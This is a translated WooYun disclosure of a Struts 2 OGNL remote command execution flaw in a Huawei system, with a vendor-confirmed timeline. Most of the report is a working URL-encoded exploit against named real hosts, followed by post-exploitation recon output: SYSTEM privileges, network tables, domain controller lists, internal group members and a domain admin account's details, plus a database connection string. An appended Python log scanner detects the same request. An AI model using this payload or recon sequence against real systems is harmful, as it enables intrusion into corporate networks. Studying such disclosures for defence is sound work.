Huawei: a certain system has a remote command execution vulnerability (can penetrate the border firewall into the production network)
Vulnerability summary
Defect ID: WooYun-2015-149850
Vulnerability title: Huawei: a certain system has a remote command execution vulnerability (can penetrate the border firewall into the production network)
Vendor: Huawei Technologies Co., Ltd. (华为技术有限公司)
Author: 猪猪侠
Submitted: 2015-10-27 15:42
Published: 2015-12-12 00:34
Vulnerability type: command execution
Severity: high
Self-assessed Rank: 20
Status: confirmed by vendor
Source: http://www.wooyun.org
Tags: third-party framework
Disclosure timeline:
2015-10-27: details sent to the vendor, awaiting vendor handling
2015-10-28: vendor confirmed; details visible to the vendor only
2015-11-07: details disclosed to core white hats and experts in the relevant field
2015-11-17: details disclosed to regular white hats
2015-11-27: details disclosed to intern white hats
2015-12-12: details disclosed to the public
Brief description:
Huawei: a certain system has a remote command execution vulnerability (can penetrate the border firewall into the production network's domain environment)
Inside the domain environment, with SYSTEM privileges, internal network penetration is possible and the impact is large. After thinking it over for a long time, I decided to write this in Chinese after all.
Domain penetration techniques used:
http://zone.wooyun.org/content/23396
Details:
#1 Vulnerable server
http://wdt-mx.huawei.com/sdtrp/project.action
http://119.145.15.78/sdtrp/project.action
Proof of vulnerability:
#2 Exploit
http://wdt-mx.huawei.com
http://119.145.15.78/sdtrp/project.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
D:\WEB_Server\apache-tomcat-6.0.44\webapps\sdtrp\
whoami
nt authority\system
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : DGGWDTRP01-TGE
Primary Dns Suffix . . . . . . . : china.huawei.com
arp -a
Interface: 10.88.178.105 --- 0xc
Internet Address Physical Address Type
10.88.178.1 00-00-5e-00-01-b2 dynamic
10.88.178.2 f8-4a-bf-5c-1d-0e dynamic
10.88.178.3 f8-4a-bf-5c-1b-fe dynamic
10.88.178.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
Interface: 10.88.72.91 --- 0xe
Internet Address Physical Address Type
10.88.72.1 00-00-5e-00-01-48 dynamic
10.88.72.2 f8-4a-bf-5c-1d-0d dynamic
10.88.72.3 f8-4a-bf-5c-1b-fd dynamic
10.88.72.5 00-25-9e-b0-db-44 dynamic
10.88.72.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
# Inside the domain environment, internal network penetration is possible; the impact is very large
net time /domain
Current time at \\LGGAD41-DC.china.huawei.com is 2015/10/27 16:52:34
Pinging LGGAD39-DC.china.huawei.com [10.72.135.58] with 32 bytes of data
Pinging uniportal.huawei.com [10.82.55.193] with 32 bytes of data:
Pinging mail.huawei.com [10.72.61.76] with 32 bytes of data:
Inside the domain: there are hundreds of domain controllers alone; several hundred thousand users is no exaggeration.
net group "Domain controllers" /domain
The request will be processed at a domain controller for domain china.huawei.com.
Group name Domain Controllers
Comment 域中所有域控制器
Members
-------------------------------------------------------------------------------
*****$ BLR*****
*****$ BRA*****
*****$ CGK*****
*****$ DFW*****
*****$ DGG*****
*****$ DGG*****
*****$ HGH*****
*****$ HKG*****
*****$ ISB*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LHR*****
*****$ LOS*****
*****$ MSC*****
*****$ NKG*****
*****$ NKG*****
*****$ NKG*****
*****$ NKG*****
*****$ PEK*****
*****$ RUH*****
*****$ SIA*****
*****$ SJC*****
*****$ SZX*****
*****$ SZX*****
*****$ SZX*****
*****D02-DC$ *****
YYZAD02-DC$
The command completed successfully.
The request will be processed at a domain controller for domain china.huawei.com.
Group name IT-ITPL-DC-CD-w
Comment 云数据中心安全解决方案部
Members
-------------------------------------------------------------------------------
***** d00*****
***** h00*****
***** h00*****
***** j00*****
***** l00*****
***** l00*****
***** l00*****
***** l00*****
***** o00*****
***** r90*****
***** s00*****
***** w00*****
***** w00*****
***** x00*****
***** y00*****
***** y90*****
***** z00*****
***** z00*****
*****0359515 *****
The command completed successfully.
# The final BOSS
The request will be processed at a domain controller for domain china.huawei.com.
User name china-admin
Full Name
Comment 管理计算机(域)的内置帐户
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2015/10/17 16:04:55
Password expires Never
Password changeable 2015/10/17 16:04:55
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *MomAdministrators
*X86-ADMIN1 *X86-ADMIN2
*X86-ADMIN3
Global Group memberships *MOMadmins *Domain Admins
*Domain Users *Group Policy Creator
The command completed successfully.
# Database of the audit monitoring system
// JScript fragment from the audit-monitoring system's task script: an ADO
// connection string with a hard-coded database login (password masked here)
var strADOConn = "Provider=sqloledb;Data Source=szxmng02-nt.huawei.com;User ID=nt_task_monitor;Password=********;Network Library=dbmssocn";
var oADOConn, oADOCommand, oADORecord;          // ADO connection, command and recordset objects
var strServer, strTask, strStatus, strADOCommand; // server name, task name, status and SQL text
var oArgs;                                       // script arguments
var iAffected;                                   // rows affected by the last command
Fix:
# Update
Copyright notice: please credit the source when reposting
猪猪侠@乌云
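Updating the framework is the fix; while that is rolled out, a defender also wants to know whether the request shape used in the proof of concept above has already hit the server. The following Python is an added defender-side example, not code from the original report or from Huawei: it scans access-log lines for a Struts 2 action-prefix parameter (`redirect:`, `redirectAction:`, `action:`) carrying an OGNL expression (`${...}` or `%{...}`), decoding repeatedly so double-encoded variants are caught. It assumes Apache/Tomcat combined log format; the log lines, client addresses and timestamps are constructed samples, and only the query-parameter fragment of line 2 mirrors the proof of concept.

```python
"""Flag Struts 2 action-prefix OGNL injection attempts in web access logs.

Added defender-side example; not code from the original report. It matches
the request shape used in the proof of concept: a query parameter whose name
begins with a Struts 2 action prefix such as "redirect:" and whose decoded
text contains an OGNL expression ("${...}" or "%{...}").
"""
import re
from urllib.parse import unquote, urlsplit

# Struts 2 action prefixes that older framework versions evaluated as OGNL.
SUSPICIOUS_PREFIXES = ("redirect:", "redirectAction:", "action:")
# Start of an OGNL expression; the PoC uses "${" followed by "#context.get(...)".
OGNL_MARKER = re.compile(r"[$%]\{")
# Assumed combined log format: client ident user [time] "request" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly: double encoding is a common filter bypass."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target):
    """Return the decoded query parameters of a request target that look like
    Struts 2 prefix-OGNL injection; an empty list means nothing matched."""
    hits = []
    for raw in urlsplit(target).query.split("&"):
        if not raw:
            continue
        # Split on "&" before decoding so an encoded "&" inside a payload stays put.
        param = decode_fully(raw)
        name = param.split("=", 1)[0]
        if name.startswith(SUSPICIOUS_PREFIXES) and OGNL_MARKER.search(param):
            hits.append(param)
    return hits


def scan_log(lines):
    """Return (client_ip, timestamp, status, decoded_params) for every hit."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append((m.group("ip"), m.group("ts"), int(m.group("status")), hits))
    return findings


# Constructed sample log lines (addresses and times are made up). Line 2 carries
# the same "redirect:${...}" parameter shape as the PoC; line 3 double-encodes it;
# line 4 is a benign "redirectAction=" parameter with no prefix colon and no OGNL.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Oct/2015:16:52:34 +0800] "GET /sdtrp/project.action?id=42 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [27/Oct/2015:16:53:01 +0800] "GET /sdtrp/project.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%7D HTTP/1.1" 200 58 "-" "curl/7.43.0"',
    '198.51.100.9 - - [27/Oct/2015:16:53:20 +0800] "GET /sdtrp/project.action?redirect%253A%2524%257B%2523context%257D HTTP/1.1" 200 58 "-" "python-requests/2.7"',
    '203.0.113.8 - - [27/Oct/2015:16:54:02 +0800] "GET /sdtrp/project.action?redirectAction=home HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, status, hits in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} HTTP {status}: {hits}")
```

Matching on the parameter name rather than on any `${` in the URL keeps ordinary template-looking values out of the alert stream, and decoding before the check is what makes the double-encoded third line show up. A 200 response on a hit is worth treating as a probable success, since the proof of concept writes its result straight into the response body.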
Vulnerability response
Vendor response:
Severity: high
Vulnerability Rank: 20
Confirmed at: 2015-10-28 00:32
Vendor reply: Thanks to 猪猪侠 for the heads-up; the business unit has been notified to fix it.
Latest status: none
Original: http://www.wooyun.org/bugs/wooyun-2015-0149850